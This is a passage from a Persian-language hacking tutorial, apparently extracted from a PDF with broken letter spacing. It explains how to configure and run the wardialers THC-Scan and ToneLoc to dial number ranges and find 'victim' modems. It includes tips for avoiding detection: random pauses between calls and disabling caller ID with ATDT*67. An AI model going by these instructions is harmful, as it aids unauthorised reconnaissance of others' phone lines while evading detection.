ﻞ‬ ‫ﺏﻴ ﺸﺘﺮ ﻧ ﺮم اﻓﺰاره ﺎی ه ﮏ و ﮐ ﺮک ﺧ ﻮب ﺕﺤ ﺖ ﺧ ﻂ ﻓﺮﻣ ﺎن اﺱ ﺖ ‪ .‬ﻣ ﻦ ای ﻦ ﻧ ﺮم اﻓ ﺰار را در اﻧ ﺪر ﻗ ﺪیﻢ زﻣ ﺎن از ﺁدرس‬ ‫‪ HTTP://THC.INFERNO.TUSCULUM.EDU/‬ﮔﺮﻓﺘﻢ‪.‬‬ ‫ﺷﮑﻞ ﻇﺎهﺮی ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪ از اﺟﺮا در ﺧﻂ ﻓﺮﻣﺎن ‪:‬‬

‫هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﯽ ﺏﻴﻨﻴﺪ !! ﺧﺮوﺟﯽ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺏﺨﺸﻬﺎی ﺕﻘﺴﻴﻢ ﺷﺪﻩ اﺱﺖ ﮐﻪ هﻤﻪ را ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ‪.‬‬ ‫‪ -١‬ﻗ ﺴﻤﺖ اول ‪ : " MODEM Window " ١‬در ای ﻦ ﻗ ﺴﻤﺖ ﺷ ﻤﺎ ﻓﺮاﻣﻴﻨ ﯽ ﮐ ﻪ از ﻃ ﺮف ﻧ ﺮم اﻓ ﺰار ﺏ ﻪ ﺱ ﻤﺖ ﻣ ﻮدم ﻗﺮﺏ ﺎﻧﯽ ﻓﺮﺱ ﺘﺎدﻩ ﺷ ﺪﻩ و‬ ‫ﭘﺎﺱﺨﻬﺎی دریﺎﻓﺘﯽ را ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ‪ ) .‬ایﻦ دﺱﺘﻮرهﺎ ﺏﺎ دﺱﺘﻮرهﺎی ﻣﻮدم هﺎی ‪ Hayes‬هﻤﺨ ﻮاﻧﯽ دارد ایﻨﮑ ﻪ ﻣ ﻮدم ه ﺎی ‪ Hayes‬ﭼ ﯽ ه ﺴﺘﻦ ﺏﻌ ﺪا‬ ‫ﻣﻴﮕﻢ ( ‪.‬‬ ‫‪ -٢‬ﻗﺴﻤﺖ دوم ‪ : " Time " ٢‬در ایﻦ ﭘﻨﺠﺮﻩ زﻣﺎن ﻓﻌﻠﯽ ‪ ،‬زﻣﺎن ﺷﺮوع و زﻣﺎن اﺡﺘﻤﺎﻟﯽ ﭘﺎیﺎن ﺕﻤﺎﺱﻬﺎ را ﺏﺮای یﺎﻓﺘﻦ ﻣﻮدم راﻣﯽ ﺏﺒﻴﻨﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٧‬‬

‫‪ -٣‬ﻗﺴﻤﺖ ﺱﻮم ‪ : " Found " ٣‬هﺮ وﻗﺖ یﮏ ﻣﻮدم ﺏﺎ ﺡﺎل ﭘﻴﺪا ﮐﻨﺪ ﺏﻪ ﺷﻤﺎ در ایﻦ ﭘﻨﺠﺮﻩ ﻧﺸﺎن ﻣﻴﺪهﺪ‪.‬‬ ‫‪ -۴‬ﻗ ﺴﻤﺖ ﭼﻬ ﺎرم ‪ : " Statistic " ۴‬در ای ﻦ ﻗ ﺴﻤﺖ از ﻧ ﺮم اﻓ ﺰار ﮔ ﺰارش ه ﺎ را ﻧﻤ ﺎیﺶ ﻣﻴﺪه ﺪ در ﺏ ﺎرﻩ وﺟ ﻮد ﺱ ﻴﮕﻨﺎل ﺡﺎﻣ ﻞ از ی ﮏ ﻣ ﻮدم ‪،‬‬ ‫ﺕﺨﻤﻴﻨﯽ از ﺕﻌﺪاد ﺕﻤﺎﺱﻬﺎ و ﺕﻌﺪاد ﻣﻮدم هﺎی ﮐﺸﻒ ﺷﺪﻩ ‪ ،‬ﺕﺨﻤﻴﻨﯽ از ﺕﻌﺪاد ﺕﻤﺎﺱﻬﺎ در یﮏ ﺱﺎﻋﺖ و ‪...‬‬ ‫‪ -۵‬ﻗﺴﻤﺖ ﺁﺧﺮ و یﺎ ﭘﻨﺠﻢ ‪ : " Log Window " ۵‬در ایﻦ ﭘﻨﺠﺮﻩ ﺕﻤﺎم ﻋﻤﻠﻴﺎت اﻧﺠﺎم ﺷﺪﻩ ﺏﻬﻢ راﻩ زﻣﺎن اﻧﺠ ﺎم و ﻣﺸﺨ ﺼﺎت ﺁن درج ﻣﻴ ﺸﻮد ‪ .‬ای ﻦ‬ ‫اﻃﻼﻋﺎت ﺏﺮای ﺏﺮﺱﯽ هﺎی ﺏﻌﺪی در یﮏ ﻓﺎیﻞ ‪ txt‬ذﺧﻴﺮﻩ ﻣﻴﺸﻮد در ﭘﻮﺷﻪ ﺏﺮﻧﺎﻣﻪ ‪.‬‬ ‫ویﮋﮔﻴﻬﺎی ای ﺏﺮﻧﺎﻣﻪ ﻋﺒﺎرﺕﻨﺪ از ‪:‬‬ ‫‪ Dial random, Sequential or list of numbers -١‬یﻌﻨﯽ ایﻨﮑﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺘﻮاﻧﺪ ﺷﻤﺎرﻩ هﺎ را هﻢ ﺏﻪ ﺻﻮرت ﺕﺼﺎدﻓﯽ اﻧﺘﺨﺎب ﮐﻨ ﺪ و ی ﺎ‬ ‫ایﻨﮑﻪ ﺷﻤﺎ ﺁﻧﻬﺎ را در یﮏ ﻓﺎیﻞ ﺏﻪ ﺕﺮﺕﻴﺐ دﻟﺨﻮاﻩ ﺏﻨﻮیﺴﻴﺪ و ﺏﺪیﺪ دﺱﺖ ﻧﺮم اﻓﺰار و یﺎ ﭘﺸﺖ ﺱﺮ هﻢ زﻧﮓ ﺏﺰﻧﺪ !!‬ ‫‪ Nudging -٢‬ﺏ ﺴﻴﺎر ﻋ ﺎﻟﯽ اﺱ ﺖ ﺡ ﺎﻻ یﻌﻨ ﯽ ﭼ ﯽ یﻌﻨ ﯽ ایﻨﮑ ﻪ ای ﻦ ﺡ ﻀﺮت ﺕﻌ ﺎﻟﯽ ﻣﻴﺘﻮاﻧ ﺪ ﺏﻌ ﺪ از ﮐ ﺸﻒ ﻣ ﻮدم ﻓﻌ ﺎل و ﺏ ﺪرد ﺏﺨ ﻮر ی ﮏ ﺱ ﺮی‬ ‫ﮐﺎراﮐﺘﺮ هﺎی از ﻗﺒﻞ ﻣﺸﺨﺺ را ﺏﺮای ﻣﻮدم ﻗﺮﺏﺎﻧﯽ ﻣﻴﻔﺮﺱﺘﺪ ‪.‬‬ ‫ﺧﻮب ﮐﻪ ﭼﯽ ؟ ﺏﺮای ایﻨﮑﻪ ﺏﻔﻬﻤﺪ ﻧﺮم اﻓﺰار ﺱﺮویﺲ دهﻨﺪﻩ ﺟﯽ اﺱﺖ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺟﻮاب در یﺎﻓﺘﯽ از ﻣﻮدم ﻗﺮﺏﺎﻧﯽ ‪.‬‬ ‫‪ Random wait between calls -٣‬ایﻦ یﻌﻨﯽ ایﻨﮑﻪ ﺏﻴﻦ ﺕﻤﺎﺱﻬﺎی ﭘﺸﺖ ﺱﺮ هﻤﯽ ﮐﻪ ﻣﻴﮕﻴﺮد ﺏﻪ ﻃﻮر دﻟﺨﻮاﻩ ﺧﻮدش ﻧ ﻪ ﺷ ﻤﺎ ی ﮏ ﺱ ﺮی وﻗﻔ ﻪ‬ ‫هﺎیﯽ ﺏﻴﻨﺪازد ﺏﻪ ﻃﻮر ﻧﺎﻣﻨﻈﻢ ﺕﺎ ﺷﻤﺎ ﻟﻮ ﻧﺮویﺪ ﺏﻪ ﻋﻠﺖ ایﻦ هﻤﻪ ﺕﻤﺎس !!‬ ‫‪ Break up Work -۴‬اﮔﺮ ﺷﻤﺎ یﮏ ﺷﺒﮑﻪ داﺧﻠﯽ و ﭼﻨﺪ ﻣﻮدم و ﭼﻨﺪ ﺧﻂ ﺕﻠﻔﻦ داریﺪ ﺏﺎ اﺱﺘﻔﺎدﻩ اﻣﮑﺎﻧ ﺎت ای ﻦ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﺎر را روی ه ﺮ ﮐ ﺎﻣﭙﻴﻮﺕﺮ‬ ‫ﺕﻘﺴﻴﻢ ﻣﻴﮑﻨﻴﻢ ﺕﺎ زود ﺕﺮ ﺏﻪ ﻧﺘﻴﺠﻪ ﺏﺮﺱﻴﻢ‪.‬‬ ‫دیﮕﺮ ویﮋﮔﻴﻬﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ای ﻦ اﺱ ﺖ ﮐ ﻪ اﮔ ﺮ ﺷ ﻤﺎرﻩ ای وﺱ ﻂ ﮐ ﺎر اﺷ ﻐﺎل ﺏ ﻮد ﺁن را ﮐﻨ ﺎر ﻣ ﯽ ﮔ ﺰارد و ﺏﻌ ﺪا ﻣ ﺪت زﻣ ﺎﻧﯽ دوﺏ ﺎرﻩ ﺁن ﺷ ﻤﺎرﻩ را‬ ‫ﻣﻴﮕﻴﺮد‪.‬‬ ‫اﮔﺮ ﮐﺴﯽ ﺁن ﻃﺮف ﺧﻂ ﮔﻮﺷﯽ را ﺏﺮدارد و هﯽ اﻟﻮ اﻟﻮ و‪ ..‬ﮐﻨﺪ ایﻦ ﺷﻤﺎرﻩ هﻢ ﮐﻨﺎر ﻣﻴﮕﺰارد و ﺏﻌﺪا ﺏﻪ اون دوﺏﺎرﻩ زﻧﮓ ﻣﻴﺰﻧﺪ‪.‬‬ ‫اﮔﺮ ﺏﻠﻨﺪﮔﻮ ﻣﻮدم ﻓﻌﺎل ﺏﺎﺷﺪ و ﺷﻤﺎ ﺻﺪای ﻃﺮف را در هﻨﮕﺎم اﻟﻮ اﻟﻮ ﮐﺮدن ﺏﺸﻨﻮیﺪ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎ ﻓﺸﺎر دﮐﻤﻪ ‪ B‬ﺻﻔﺤﻪ ﮐﻠﻴ ﺪ ارﺕﺒ ﺎط را ﻗﻄ ﻊ ﮐﻨﻴ ﺪ و ی ﺎ‬ ‫اﮔﺮ ﺻﺪای ﻣﻮدم را ﻣﻴﺸﻨﻮیﺪ ﺏﺎ ﻓﺸﺎر دﮐﻤﻪ ‪ C‬ﺁن ﺷﻤﺎرﻩ را ﺏﺮای ﺷﻤﺎ ﺙﺒﺖ ﮐﻨﺪ و‪...‬‬ ‫یﮏ ﮐﻢ ریﺰ ﺕﺮ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ اول ایﻦ ﻧﺮم اﻓﺰار ﺏﺎﻻ ﺷﮑﻞ ﭘﻴﺶ رﻓﺘﻪ ﻧﺮم اﻓﺰار ‪ Tone loc‬اﺱﺖ ﮐﻪ اون هﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ‪.‬‬ ‫ایﻦ دوﺕﺎ ﺧﻴﻠﯽ ﺱﺮ راﺱﺖ ﻧﺼﺐ ﻣﻴﺸﻮﻧﺪ و ﻓﻘﻂ ﺷﻤﺎ ﺏﺎیﺪ ﻓﺎیﻞ اﺟﺮایﯽ ﺁن را ﮐﭙﯽ ﮐﻨﻴﺪ ﺏﻌﺪ اﺟﺮا ﮐﻨﻴﺪ !! اﮔﺮ ﻓﺎیﻞ ‪ ts-cfg‬را اﺟ ﺮا ﮐﻨﻴ ﺪ ﻣ ﯽ ﺕﻮاﻧﻴ ﺪ‬ ‫ﭘﻴﮑﺮ ﺏﻨﺪی ﺁن را دﺱﺖ ﮐﺎری ﮐﻨﻴﺪ ﺕﻮﺻﻴﻪ ﻣﻴﺸﻮد ﮐﺪ ﻣﻨﻄﻘﻪ ﺧﻮد را ﺡﺘﻤﺎ وارد ﮐﻨﻴﺪ ﻣﺜﻼ ﺕﻬﺮاﻧﯽ هﺎ‪ ٠٢١‬و ﮐﺮﺟﯽ هﺎ ‪ ٠٢۶١‬و‪ ...‬ﭼﻮن ﻣ ﻮﻗﻌﯽ ﮐ ﻪ‬ ‫در ﺧﻂ ﻓﺮﻣﺎن ﻣﻴﺨﻮاهﻴﻢ ﺷﻤﺎرﻩ ﮔﻴﺮی ﮐﻨﻴﻢ ﻣﺸﮑﻠﯽ ﭘﻴﺶ ﻧﻴﺎیﺪ !!ﺷﮑﻞ ﻇﺎهﺮی ایﻦ ﺏﻪ ایﻦ ﺻﻮرت اﺱﺖ‪:‬‬

‫ﮐﻪ ﭘﺲ از زدن ﮔﺰیﻨﻪ ‪ ) Modem Config‬ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﻮدم ( ﺏﻪ ایﻦ ﺷﮑﻞ ﻣﻴﺸﻮد ‪:‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٨‬‬

‫اﻟﺒﺘﻪ زیﺎد ﺷﻤﺎ در ایﻦ ﻗﺴﻤﺖ دﺱﺖ ﮐﺎری ﻧﮑﻨﻴ ﺪ وﻟ ﯽ ﻓﻘ ﻂ ﭘ ﻮرت را ی ﮏ ﻧﮕ ﺎﻩ ﺏﻨﺪازی ﺪ ﺏﺒﻴﻨﻴ ﺪ درﺱ ﺖ ی ﺎ ﻧ ﻪ اﮔ ﺮ ﻧﻤ ﯽ داﻧﻴ ﺪ ﺟﻠ ﻮی ‪ IRQ‬ﭼ ﯽ ﺏﺎی ﺪ‬ ‫ﺏﻨﻮیﺴﻴﺪ ﻧﺮم اﻓﺰار ﮐﻤﮑﯽ ﺁن را ﺏﺎ ﻧﺎم ‪ MOD-DET.EXE‬اﺟﺮا ﮐﻨﻴﺪ ﺏﻌﺪ ﻣﻴﻔﻬﻤﻴﺪ وﻟﯽ ﺷﮑﻞ ﮐﻠﯽ ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ‪:‬‬ ‫‪COM‬‬ ‫‪IRQ‬‬ ‫‪I/P Port‬‬ ‫‪1‬‬ ‫‪4‬‬ ‫‪3f8‬‬ ‫‪2‬‬ ‫‪3‬‬ ‫‪2f8‬‬ ‫‪3‬‬ ‫‪4‬‬ ‫‪3e8‬‬ ‫‪4‬‬ ‫‪3‬‬ ‫‪2e8‬‬ ‫اﮔﺮ ﻣﯽ ﺧﻮاهﻴﺪ ﺟﺰﺋﻴﺎت ﺏﻴﺸﺘﺮی را ﺕﻨﻈﻴﻢ ﮐﻨﻴﺪ ﻣﺜﻞ ﺕﺎیﻢ اوت ﺏﺮای ﻓﺮاﺧﻮاﻧﯽ )ﭼﻘﺪر زﻣ ﺎن ﺏ ﺮای ه ﺮ ﺷ ﻤﺎرﻩ ﺻ ﺮف ﺷ ﻮد(‪ ،‬ﺷ ﻤﺎرﻩ ﮔﻴ ﺮی ﻣﺠ ﺪد‬ ‫ﺷﻤﺎرﻩ هﺎی اﺷﻐﺎل اﻧﺠﺎم ﺏﺸﻮد یﺎ ﻧﻪ ‪ ،‬ﺕﺼﺎدﻓﯽ ﺷﻤﺎرﻩ ﺏﮕﻴﺮد یﺎ ﻧﻪ و ‪ ...‬ﺏﻪ ﻣﻨﻮی ‪ Scanning Options‬ﺏﺮویﺪ ﮐﻪ ایﻦ ﺷﮑﻠﯽ‪:‬‬

‫ﻣﻦ ﻧﻤﯽ ﺧﻮاهﻢ ریﺰ ﺟﺰﺋﻴﺎت ﺏﺎ ایﻦ یﺎدﺕﻮن ﺏﺪم ) ﭼﻮن ﺧﻴﻠﯽ ﺧﻴﻠﯽ ﺕﺎﺏﻠﻮ( ﺧﻮدﺕﻮن یﮏ ﻧﻴﻢ روز ﺱﺮف ﺁن ﮐﻨﻴﺪ ﻣﻴﻔﻬﻤﻴ ﺪ ه ﻴﭻ ﮐ ﺎری ﻧ ﺪارد‪ .‬در ﺁﺧ ﺮ‬ ‫ﻓﺎیﻞ ﭘﻴﮑﺮ ﺏﻨﺪی را ذﺧﻴﺮﻩ ﮐﻨﻴﺪ و ﺧﺎرج ﺷﻮیﺪ‪.‬‬ ‫ﺏﻌﺪ از ﭘﻴﮑﺮ ﺏﻨﺪی ﮐﻪ ﻣﻄﺎﻟﺐ ﻣﻬﻢ ﺁن را یﺎدﺕﻮن دام ﻣﻮﻗﻊ اﺟﺮا ﻧﺮم اﻓﺰار‪ ،‬ﻓﺮا ﻣﻴﺮﺱﺪ ﺏﺎیﺪ ﺷﻤﺎ در ﺧﻂ ﻓﺮﻣﺎن ﺏﻨﻮیﺴﻴﺪ‪:‬‬ ‫]‪Microsoft Windows XP [Version 5.1.2600‬‬ ‫‪(C) Copyright 1985-2001 Microsoft Corp.‬‬ ‫‪D:\zornaznfarsinvashtam>Thc-scan filename.dat/m:123.xxxx/r:1000.9999‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٩‬‬

‫ﺏﺎز هﻢ یﮏ ﺕﻮﺽﻴﺢ ﮐﻮﭼﻮﻟﻮ در ﺏﺎرﻩ ایﻦ دﺱﺘﻮر ﻣﻴ ﺪهﻢ ‪ .‬ﮔﺰیﻨ ﻪ ‪ /M‬ﻧﻤﺎی ﺎﻧﮕﺮ ﭘﻴ ﺸﻮﻧﺪ و داﻣﻨ ﻪ ﺷ ﻤﺎرﻩ ﺕﻠﻔ ﻦ ه ﺎ اﺱ ﺖ ﮐ ﻪ ﺏﺎی ﺪ ﺷ ﻤﺎرﻩ ﮔﻴ ﺮی ﺷ ﻮﻧﺪ‬ ‫‪.‬ﮔﺰیﻨﻪ ‪ /R‬یﺎ ‪ Range‬ارﻗﺎﻣﯽ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﮐﻪ در ﻧﻘﺎط ﻣ ﺸﺨﺺ ﺏ ﺎ ‪ X‬در ﻓﺮﻣ ﺎن ﻣﻴﺒﺎﺷ ﺪ‪.‬ﺧ ﻮدم ه ﻢ ﻧﻔﻬﻤﻴ ﺪم ﭼ ﯽ ﮔﻔ ﺘﻢ ﺏ ﻪ ﻋﺒ ﺎرت دیﮕ ﺮ ‪،‬‬ ‫ﻓﺮﻣﺎن ﺏﺎﻻ ﮐﻠﻴﻪ ارﻗﺎم ﺏﻴﻦ ‪ ١٢٣-١٠٠٠‬و ‪ ١٢٣-٩٩٩٩‬را ﺷﻤﺎرﻩ ﮔﻴﺮی ﻣﻴﮑﻨﺪ ‪ ٣ /M ).‬ﺕﺎ ‪ ۶‬رﻗﻢ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ‪(.‬‬ ‫ﮔﺰیﻨﻪ ‪ Filename.dat‬هﻢ هﻤﺎن ﻧﺎم ﻓﺎیﻞ ﺕﻨﻈﻴﻤﻬﺎ ی ﺷﻤﺎ اﺱﺖ ﮐﻪ ﺏﺎﻻ درﺱﺖ ﮐﺮدیﺪ‪.‬هﻤﻴﻦ!!‬ ‫اﺡﺘﻤﺎﻻ یﻌﻨﯽ ‪ %١٠٠‬ﻗﺒﻞ از ایﻦ ﻧﺮم اﻓﺰار ﺏﺎﻻیﯽ ‪ Tone loc‬هﻢ ﮐﺎرﻩ ﺏﻮدﻩ !! اﻟﺒﺘﻪ ایﻦ ﺏﺎﺏﺎی ﺏﻼیﯽ اﺱﺖ ﻣﻦ ﺕﻮﺻﻴﻪ ﻧﻤﻴﮑﻨﻢ از ای ﻦ اﺱ ﺘﻔﺎدﻩ ﮐﻨﻴ ﺪ‬ ‫وﻟﯽ ﺏﺎز ﻃﺮﻓﺪار ﺧﻮدش را دارد ﺷ ﺎیﺪ ﺷ ﻤﺎ ه ﻢ از ﻃﺮﻓ ﺪارهﺎی ﺁن ﺷ ﺪیﺪ‪ .‬وﻟ ﯽ ﺧﻴﻠ ﯽ ﻗ ﻮی وﻟ ﯽ دﻧ ﮓ ﻓ ﻦ ﮔ ﺶ ﺧﻴﻠ ﯽ زی ﺎد‪.‬ﻣ ﻦ ای ﻦ ﺏ ﻪ ﻋﻠ ﺖ ﮐﻤ ﯽ‬ ‫ﭘﻴﭽﻴﺪﮔﯽ ﺁن ﺏﻴﺸﺘﺮ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ !!‬ ‫ایﻦ اﺏﺰار هﻤﻴﻨﻄﻮر ﮐﻪ ﻣﻴﺪاﻧﻴﺪ ﺏﺮﻧﺎﻣﻪ ﺷﻤﺎرﻩ ﮔﻴﺮ ﺕﺤﺖ ‪ DOS‬اﺱﺖ ﮐﻪ اﻣﮑﺎن ﺷﻤﺎرﻩ ﮔﻴﺮی ﺧﻮدﮐﺎر و ﻣﺪیﺮیﺖ ﺏﻴﺶ از ‪١٠٠٠٠‬‬ ‫ﺷﻤﺎرﻩ را دارد ﺕﻤﺎم ﻗﺎﺏﻠﻴﺖ هﺎی ‪ THC Scan‬را دارا ﻣﻴﺒﺎﺷ ﺪ اﻟﺒﺘ ﻪ ﺏﻐﻴ ﺮ از ‪ User Friendly‬ﺏ ﻮدن را !! اﻟﺒﺘ ﻪ دارای ی ﮏ راﺏ ﻂ ﮐ ﺎرﺏﺮ ﮐ ﻪ از‬ ‫ﮐﺎراﮐﺘﺮ هﺎی ‪ ASC 2‬اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﺪ هﺴﺖ ﮐﻪ ﮐﺎر را ﺱﺎدﻩ ﮐﺮدﻩ اﺱﺖ اﻟﺒﺘﻪ ﺏﺎ ﺱﻮیﭻ هﺎ در ﺧﻂ ﻓﺮﻣﺎن ﮐﺎر ﺁﻧﺮا ﻣﻴﺸﻮد ﮐﺮد‪ .‬ﻗﺒ ﻞ از اﺱ ﺘﻔﺎدﻩ از‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺎیﺪ ایﻦ را ﻣﺜﻞ ﻧﺮم اﻓﺰار ﻗﺒﻠﯽ ﭘﻴﮑﺮ ﺏﻨﺪی ﮐﻨﻴﺪ ﺏﺮای ایﻦ ﮐﺎر ﻓﺎی ﻞ ‪ Tlcfg.exe‬را اﺟ ﺮا ﮐﻨﻴ ﺪ ای ﻦ ﺏﮕ ﻢ ﮐ ﻪ دﮐﻤ ﻪ ‪ Enter‬روی ﮐﻴﺒ ﻮرد‬ ‫ﮐﺎر ﺏﺎز ﮐﺮدن ﻣﻨﻮ هﺎ را دارد و ‪ Esc‬ﺏﺎﻋﺚ ﺏﺴﺘﻪ ﺷﺪن ﺁن ﻣﻴﺸﻮد ﺏﺎ ﮐﻠﻴﺪ هﺎی ﺟﻬﺘﯽ ﻣﻴﺘﻮاﻧﻴﺪ ﺕﻮ ﻣﻨﻮ هﺎ ﺡﺮﮐﺖ ﮐﻨﻴﺪ !!‬ ‫ﻣﻨﻮی ‪: Files‬‬

‫ﺏﺎ اﺱﺘﻔﺎدﻩ از ﻣﻨﻮی ﻓﺎیﻞ ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ اﺱﺎﻣﯽ ﻣﻮرد ﻧﻈﺮﺕﺎن ﺏﺮای ﻓﺎیﻠﻬﺎیﯽ ﻣﺜﻞ ‪ Found ، LOG‬و ﻏﻴﺮﻩ را ﺕﻐﻴﻴﺮ ﺏﺪهﻴﺪ‪ .‬ایﻦ ﻓﺎیﻠﻬﺎ ﻧﺘﺎیﺠﯽ ﻣﺜﻞ‬ ‫ﺕﻠﻔﻦ ﻣﺸﻐﻮل ﺏﻮد و ﺟﻮاب ﻧﺪاد و یﮏ ﻣﻮدم ﭘﻴﺪا ﮐﺮدم و ‪ ....‬را دارا ﻣﻴﺒﺎﺷﻨﺪ !! ) ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ دﺱﺖ ﻧﺰﻧﻴﺪ " هﺎ ﻟﻮ " ﮔﻴﺞ ﻣﻴ ﺸﻮد ﺁﺧ ﺮش هﻨﮕﻴ ﺎت‬ ‫ﻣﻴﮑﻨﺪ(‪.‬ﻓﺎیﻞ ‪ Black list‬ﺷﻤﺎرﻩ هﺎیﯽ ﮐﻪ هﺮﮔﺰ ﻧﺒﺎیﺪ ﺏﮕﻴﺮد ﻣﺜﻞ اورژاﻧﺲ‪ ،‬ﺁﺕﺶ ﻧﺸﺎﻧﯽ‪ ،‬ﭘﻠﻴﺲ و‪ ...‬اﺱﺖ‪.‬‬ ‫‪ Alt Screen‬هﻢ ﺡﺎوی راهﻨﻤﺎیﯽ هﺎی ﻧﺎ ﻣﺮﺏﻮﻃﻪ اﺱﺖ‪ .‬ﻻزم ﺏﻪ ذﮐﺮ اﺱﺖ در ﻧﺎم ﮔﺰاری ﻓﺎیﻞ هﺎ ﻗﺎﻋ ﺪﻩ ﻋﻬ ﺪ ﺏ ﻮق ‪ DOS ٨٫٣‬را ﺡﺘﻤ ﺎ رﻋﺎی ﺖ‬ ‫ﮐﻨﻴﺪ یﻌﻨﯽ ‪ ٨‬ﮐﺎراﮐﺘﺮ ﺏﺮای ﻧﺎم و ‪ ٣‬ﮐﺎراﮐﺘﺮ ﺏﺮای ﭘﺴﻮﻧﺪ ﻓﺎیﻞ !!‬ ‫ﻣﻨﻮی ‪: Modem Strings‬‬

‫ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﻣﻨﻮ ﻣﻴﺘﻮاﻧﻴﺪ دﺱﺘﻮرات اﺱﺘﺎﻧﺪارد ﻣﻮدم هﺎی ‪ Hayes‬یﺎ ﺏﻪ ﻋﺒﺎرت ﺱﺎدﻩ ﺕﺮ دﺱﺘﻮرات ‪ AT‬را ﺏﺮای ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﻮدم اﺱﺘﻔﺎدﻩ ﮐﻨﻴ ﺪ‬ ‫ﻣﺜﻼ ﭘﻴﺸﻮﻧﺪ ﺷﻤﺎرﻩ ﮔﻴﺮی را از ‪ ATDT‬ﺏﻪ ‪ ATDT*67‬ﻋﻮض ﮐﻨﻴﺪ ﺕ ﺎ ‪ Caller ID‬از ﮐ ﺎر ﺏﻴﻔﺘ ﺪ ﻣﻴﺘﻮاﻧﻴ ﺪ ﭘﻴ ﺸﻮﻧﺪ ه ﺎی دیﮕ ﺮی را ه ﻢ اﺱ ﺘﻔﺎدﻩ‬ ‫ﮐﻨﻴﺪ ﻣﺜﻞ ‪ ATDT9,1907‬یﻌﻨﯽ ایﻨﮑﻪ اﺏﺘﺪا ﺷﻤﺎرﻩ ‪ ٩‬را ﺏﺮای دﺱﺖ رﺱﯽ ﺏﻪ ﺧ ﻂ ﺕﻠﻔ ﻦ ﻣﻴﮕﻴ ﺮد و ﺱ ﭙﺲ ﮐ ﺪ درﺧﻮاﺱ ﺖ ﺷ ﻤﺎرﻩ ﮔﻴ ﺮی از راﻩ دور‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١٠‬‬

‫‪ ١٠٩٧‬ﮐﻪ ایﻦ ﺏﻪ درد ادارات ﻣﻴﺨﻮرد ‪ .‬ﻣﻴﮕﻢ از ﮐﺠﺎ ﺏﻘﻴﻪ ایﻦ دﺱﺘﻮرهﺎ را ﭘﻴﺪا ﮐﻨﻴﺪ‪.‬اﮔﺮ ﺏﻪ هﺮ دﻟﻴﻠﯽ هﻨﮕﻴﺎت ﮐﺮد روی ﮔﺰیﻨﻪ ‪ String‬و ‪Tone‬‬ ‫‪ Hangup‬ﻣﺮﺏﻮط ﺏﻪ ﻣﻮدم ﺧﻮدﺕﻮن ﮐﻠﻴﺪ ﮐﻨﻴﺪ ‪.‬‬ ‫ﻓﺮاﻣﻴﻦ ‪ AT‬را از ﺁدرس زیﺮ ﻣﻴﺘﻮاﻧﻴﺪ ﭘﻴﺪا ﮐﻨﻴﺪ‪:‬‬ ‫‪http://www.modemhelp.net/basicatcommand.shtml‬‬ ‫ﻣﻨﻮی ‪: Modem Options‬‬

‫ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از اﻣﮑﺎﻧﺎت ایﻦ ﻣﻨﻮ ﻣﻴﺘﻮاﻧﻴﺪ ﺕﻨﻈﻴﻤﺎت ﺱﺨﺖ اﻓﺰاری ﻣﻮدم را اﻧﮕﻮﻟﮏ ﮐﻨﻴﺪ‪ .‬اﮔﺮ از ایﻦ ﺟ ﺎ ﭼﻴ ﺰی ﺱ ﺮ در ﻧﻴ ﺎوردﻩ ای ﺪ ه ﻴﭻ ﻧﮕ ﺮان‬ ‫ﻧﺒﺎﺷﻴﺪ ﻓﻘﻂ ﻻزم ﭘﻮرت ‪ COM‬را ﺕﻌﻴﻴﻦ ﮐﻨﻴﺪ ﮐ ﻪ ﺁن را از ﮐﻨﺘ ﺮل ﭘﺎﻧ ﻞ ویﻨ ﺪوز ﻗ ﺴﻤﺖ ﻣ ﻮدم ﺕ ﺸﺨﻴﺺ ﺏﺪهﻴ ﺪ ﮐ ﻪ ﻣﻌﻤ ﻮﻻ ‪ COM 3‬اﺱ ﺖ ﺏ ﺮای‬ ‫ﻣﻮدم هﺎی داﺧﻞ ﮐﻴﺲ ‪ .‬یﮏ ﻣﺸﮑﻞ اﺱﺎس ایﻦ ﺏﺮﻧﺎﻣﻪ ﻋﺪم ﭘﺸﺘﻴﺒﺎﻧﯽ از ﭼﻨﺪ ﻣﻮدم و 